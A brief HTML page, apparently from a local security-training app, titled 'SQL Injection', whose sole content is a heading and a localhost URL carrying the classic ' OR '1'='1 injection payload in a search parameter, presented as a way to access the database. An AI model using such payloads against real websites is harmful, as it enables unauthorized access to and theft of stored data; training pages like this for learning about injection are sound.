<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SQL Injection</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 20px;
        }
        h1 {
            color: #FF5733;
        }
        h2 {
            color: #c0392b;
        }
        table {
            width: 100%;
            border-collapse: collapse;
            margin-top: 20px;
        }
        th, td {
            padding: 8px;
            border: 1px solid #ddd;
            text-align: left;
        }
        ul {
            margin-top: 20px;
            padding-left: 20px;
        }
        .warning {
            color: red;
        }
    </style>
</head>
<body>
 
    <h1>SQL Injection Payload. Add the URL to the browser to access the database</h1>
    <h2>http://127.0.0.1:8000/training/search-user/?query=test%27%20OR%20%271%27=%271</h2>
</body>
</html>